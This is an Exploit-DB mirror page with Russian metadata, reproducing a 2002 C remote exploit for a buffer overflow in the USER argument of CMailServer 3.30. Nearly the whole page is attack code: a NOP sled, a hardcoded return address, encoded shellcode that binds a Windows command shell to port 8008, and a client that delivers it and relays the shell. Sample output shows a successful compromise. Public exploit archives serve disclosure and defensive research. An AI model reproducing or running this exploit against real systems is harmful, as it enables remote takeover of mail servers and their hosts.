- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 21466
- Проверка EDB
-
- Пройдено
- Автор
- ANONYMOUS
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-2002-0799
- Дата публикации
- 2002-05-20
C:
// source: https://www.securityfocus.com/bid/4789/info
CMailServer is vulnerable to a buffer overflow condition. It has been reported that the CMailServer does not perform proper bounds checking on the USER argument.
It is possible for a remote malicious attacker to craft a request that will result in code execution on the vulnerable system.
This issue has been reported in CMailServer 3.30. Other versions may also be affected.
/*
cmeexp.c
May 20, 2002
CMailServer 3.30 uses sprintf() without any previous
bounds checking while testing for the presence of the
passed USER argument's home directory within 'mail'..
sprintf(%s\\mail\\%s, CMail path ptr, USER arg ptr)
you know how the story goes, we can overwrite some
serious EIP action..
USER <510 bytes><EIP>
the payload is on the right as I didn't bother finding
or making one fit on the left
[xx@xxxx cmail]$ ./cmeexp the.man
CMailServer 3.30 remote 'root' exploit (05/20/2002)
[email protected]
connecting...
connected.. sending code
code dumped..
connecting to port 8008...
success! izn0rw3ned!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
E:\Program Files\CMailServer>date
The current date is: Mon 20/05/2002
Enter the new date: (dd-mm-yy)
*/
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/errno.h>
/* Win2k SP2 + all hotfixes up until May 20th */
/* you've got one shot at this as cmail is */
/* going down if you miss.. */
/* this is the most consistant EIP hit on my */
/* test machine although freshly booted she */
/* tended to be "\x6d\xa7\xdb\x02" */
/* try in offsets of 0x100000 if you must.. */
#define EIP "\x6d\xa7\x0e\x03"
/* everything all rolled into one.. bind's cmd.exe */
/* to port 8008.. this is a modified version of the */
/* shellcode created by |Zan's excellent generator */
char shell[] =
"\x55\x53\x45\x52\x20"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x83\xee\x7f\x83\xee\x7f\x83\xee\x7f\x83\xee\x7f"
"\x83\xee\x7f\x83\xee\x7f\x83\xee\x7f\x83\xee\x7f\x83\xee"
"\x7f\x83\xee\x4c\xff\xd6"EIP"\x55\x8b\xec\x68\x5e\x56\xc3"
"\x90\x54\x59\xff\xd1\x58\x33\xc9\xb1\x1c\x90\x90\x90\x90"
"\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04\x90\x90\x90\xac"
"\x34\x13\xaa\xe2\xfa\xfb\x13\x13\x13\x13\x4e\x92\xfe\xca"
"\x32\x53\x13\x9e\xa6\xe1\x37\x53\x13\x9e\xae\xe9\x37\x53"
"\x13\x79\x14\x83\x83\x83\x83\x4a\xfb\xc1\x11\x13\x13\x9e"
"\xa6\x39\x36\x53\x13\x9e\xae\x20\x36\x53\x13\x79\x19\x83"
"\x83\x83\x83\x4a\xfb\xa9\x11\x13\x13\x79\x13\x9e\xa6\xca"
"\x36\x53\x13\x45\x9e\xa6\xf6\x36\x53\x13\x45\x9e\xa6\xfa"
"\x36\x53\x13\x45\xec\x86\x20\x36\x53\x13\x79\x13\x9e\xa6"
"\xca\x36\x53\x13\x45\x9e\xa6\xfe\x36\x53\x13\x45\x9e\xa6"
"\xe2\x36\x53\x13\x45\xec\x86\x20\x36\x53\x13\xd4\x96\xe6"
"\x36\x53\x13\x57\x13\x13\x13\x9e\xa6\xe6\x36\x53\x13\x45"
"\xec\x86\x24\x36\x53\x13\x9e\xa6\x3e\x35\x53\x13\xbe\x43"
"\xec\x86\x40\x36\x53\x13\x9e\xa6\x22\x35\x53\x13\xbe\x43"
"\xec\x86\x40\x36\x53\x13\x9e\xa6\xe2\x36\x53\x13\x9e\xae"
"\x3e\x35\x53\x13\xb6\x9e\xa6\xf6\x36\x53\x13\xbe\x9e\xae"
"\x22\x35\x53\x13\xb8\x9e\xae\x26\x35\x53\x13\xb8\xd4\x96"
"\x36\x35\x53\x13\x13\x13\x13\x13\xd4\x96\x32\x35\x53\x13"
"\x12\x12\x13\x13\x9e\xa6\x2a\x35\x53\x13\x45\x9e\xa6\xe6"
"\x36\x53\x13\x45\x79\x13\x79\x13\x79\x03\x79\x12\x79\x13"
"\x79\x13\x9e\xa6\x5a\x35\x53\x13\x45\x79\x13\xec\x86\x28"
"\x36\x53\x13\x7b\x13\x33\x13\x13\x83\x7b\x13\x11\x13\x13"
"\xec\x86\x50\x36\x53\x13\x9a\x96\x42\x35\x53\x13\x20\xd3"
"\x43\x53\x43\x53\x43\xec\x86\xe9\x37\x53\x13\x43\x48\x79"
"\x03\x9e\xa6\xda\x36\x53\x13\x45\x40\xec\x86\xed\x37\x53"
"\x13\x79\x10\x40\xec\x86\x11\x36\x53\x13\x9e\xa6\x46\x35"
"\x53\x13\x45\x9e\xa6\xda\x36\x53\x13\x45\x40\xec\x86\x15"
"\x36\x53\x13\x9e\xae\x4a\x35\x53\x13\xb8\x20\xd3\x43\x9e"
"\xae\x76\x35\x53\x13\x44\x43\x43\x43\x9e\xa6\xfa\x36\x53"
"\x13\xbe\x43\xec\x86\x2c\x36\x53\x13\x79\x23\xec\x86\x5c"
"\x36\x53\x13\xf8\x5e\x83\x83\x83\x20\xd3\x43\x9e\xae\x76"
"\x35\x53\x13\x44\x43\x43\x43\x9e\xa6\xfa\x36\x53\x13\xbe"
"\x43\xec\x86\x2c\x36\x53\x13\x79\x43\xec\x86\x5c\x36\x53"
"\x13\x90\xae\x76\x35\x53\x13\x11\x1c\x91\x04\x12\x13\x13"
"\x92\xae\x76\x35\x53\x13\x12\x33\x13\x13\x61\x1d\x83\x83"
"\x83\x83\xd4\x96\x76\x35\x53\x13\x13\x33\x13\x13\x79\x13"
"\x98\x96\x76\x35\x53\x13\x9e\xae\x76\x35\x53\x13\x44\x43"
"\x98\x96\x42\x35\x53\x13\x43\x9e\xa6\xfa\x36\x53\x13\xbe"
"\x43\xec\x86\x54\x36\x53\x13\x79\x43\xec\x86\x5c\x36\x53"
"\x13\x98\x96\x76\x35\x53\x13\x79\x13\x43\x9e\xa6\x42\x35"
"\x53\x13\xbe\x43\x9e\xa6\x4a\x35\x53\x13\xbe\x43\xec\x86"
"\x19\x36\x53\x13\x79\x13\x9e\xae\x76\x35\x53\x13\x44\x79"
"\x13\x79\x13\x79\x13\x9e\xa6\xfa\x36\x53\x13\xbe\x43\xec"
"\x86\x2c\x36\x53\x13\x79\x43\xec\x86\x5c\x36\x53\x13\x20"
"\xda\x2a\x9e\x76\x35\x53\x13\x1c\x94\x74\xec\xec\xec\x79"
"\x13\x7b\x13\x33\x13\x13\x83\x9e\xa6\x42\x35\x53\x13\xbe"
"\x43\x9e\xa6\x4a\x35\x53\x13\xbe\x43\xec\x86\x1d\x36\x53"
"\x13\x9a\x96\x72\x35\x53\x13\x79\x13\x9e\xae\x76\x35\x53"
"\x13\x44\x43\x9e\xa6\x42\x35\x53\x13\xbe\x43\x9e\xa6\xfe"
"\x36\x53\x13\xbe\x43\xec\x86\x58\x36\x53\x13\x79\x43\xec"
"\x86\x5c\x36\x53\x13\x79\x13\x98\x96\x72\x35\x53\x13\x9e"
"\xae\x76\x35\x53\x13\x44\x43\x98\x96\x42\x35\x53\x13\x43"
"\x9e\xa6\xfa\x36\x53\x13\xbe\x43\xec\x86\x54\x36\x53\x13"
"\x79\x43\xec\x86\x5c\x36\x53\x13\xfa\xaa\xed\xec\xec\x9e"
"\xa6\x4a\x35\x53\x13\xbe\x43\xec\x86\x01\x36\x53\x13\x9e"
"\xa6\x4e\x35\x53\x13\xbe\x43\xec\x86\x01\x36\x53\x13\x79"
"\x13\xec\x86\x44\x36\x53\x13\x42\x45\x7b\xd3\xf1\x56\x13"
"\x83\x49\xec\x01\x43\x48\x4a\x44\x4d\x42\x45\x40\x7b\xd7"
"\xf1\x56\x13\x83\x49\xec\x01\x43\xbf\x97\xd3\x66\xe8\x4b"
"\xb8\x4a\xf1\xfa\xd0\x44\x40\x5c\x50\x58\x20\x21\x13\x60"
"\x7c\x70\x78\x76\x67\x13\x71\x7a\x7d\x77\x13\x7f\x7a\x60"
"\x67\x76\x7d\x13\x72\x70\x70\x76\x63\x67\x13\x60\x76\x7d"
"\x77\x13\x61\x76\x70\x65\x13\x70\x7f\x7c\x60\x76\x60\x7c"
"\x70\x78\x76\x67\x13\x58\x56\x41\x5d\x56\x5f\x20\x21\x13"
"\x50\x61\x76\x72\x67\x76\x43\x7a\x63\x76\x13\x54\x76\x67"
"\x40\x67\x72\x61\x67\x66\x63\x5a\x7d\x75\x7c\x52\x13\x50"
"\x61\x76\x72\x67\x76\x43\x61\x7c\x70\x76\x60\x60\x52\x13"
"\x43\x76\x76\x78\x5d\x72\x7e\x76\x77\x43\x7a\x63\x76\x13"
"\x54\x7f\x7c\x71\x72\x7f\x52\x7f\x7f\x7c\x70\x13\x41\x76"
"\x72\x77\x55\x7a\x7f\x76\x13\x44\x61\x7a\x67\x76\x55\x7a"
"\x7f\x76\x13\x40\x7f\x76\x76\x63\x13\x50\x7f\x7c\x60\x76"
"\x5b\x72\x7d\x77\x7f\x76\x13\x56\x6b\x7a\x67\x43\x61\x7c"
"\x70\x76\x60\x60\x13\x50\x7c\x77\x76\x77\x33\x71\x6a\x33"
"\x6f\x49\x72\x7d\x33\x2f\x7a\x69\x72\x7d\x53\x77\x76\x76"
"\x63\x69\x7c\x7d\x76\x3d\x7c\x61\x74\x2d\x11\x13\x0c\x5b"
"\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x1f\x13"
"\x13\x13\x13\x13\x13\x13\x12\x13\x13\x13\x13\x13\x13\x13"
"\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13"
"\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13"
"\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13"
"\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13"
"\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13"
"\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13"
"\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x50\x5e"
"\x57\x3d\x56\x4b\x56\x13\x13\x13\x13\x13\x03\x13\x13\x13"
"\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13"
"\x13\x13\x1a\x1a\x1a\x1a\x1a\x90\x90\x90\x0d\x0a";
main(char argc, char **argv){
int fd;
int bufsize = 1024;
int buffer = malloc(bufsize);
struct sockaddr_in sin;
struct hostent *he;
struct in_addr in;
printf("CMailServer 3.30 remote 'root' exploit (05/20/2002)\n");
printf("[email protected]\n\n\n");
if (argc < 2){
printf("Usage: <hostname>\n");
exit(-1);
}
if((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0){perror("socket error");exit(-1);}
if ((he = gethostbyname(argv[1])) != NULL){memcpy (&in, he->h_addr, he->h_length);}
else
if ((inet_aton(argv[1], &in)) < 0){printf("unable to resolve host");exit(-1);}
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr(inet_ntoa(in));
sin.sin_port = htons(110);
printf("connecting...\n");
if(connect(fd, (struct sockaddr *)&sin, sizeof(sin)) < 0){perror("connection error");exit(-1);}
printf("\nconnected.. sending code\n\n");
if(write(fd, shell, strlen(shell)) < strlen(shell)){perror("write error");exit(-1);}
printf("code dumped..\n\n");
close(fd);
if((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0){perror("socket error");exit(-1);}
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr(argv[1]);
sin.sin_port = htons(8008);
printf("connecting to tcp port 8008...\n");
sleep(1);
if(connect(fd, (struct sockaddr *)&sin, sizeof(sin)) < 0){printf("exploit failed.. adjust EIP?\n\n");exit(-1);}
printf("success! izn0rw3ned!\n\n");
while(1) {
fd_set input;
FD_SET(0,&input);
FD_SET(fd,&input);
if((select(fd+1,&input,NULL,NULL,NULL))<0) {
if(errno==EINTR) continue;
printf("connection reset\n"); fflush(stdout);
exit(1);
}
if(FD_ISSET(fd,&input))
write(1,buffer,read(fd,buffer,bufsize));
if(FD_ISSET(0,&input))
write(fd,buffer,read(0,buffer,bufsize));
}
close(fd);
}
- Источник
- www.exploit-db.com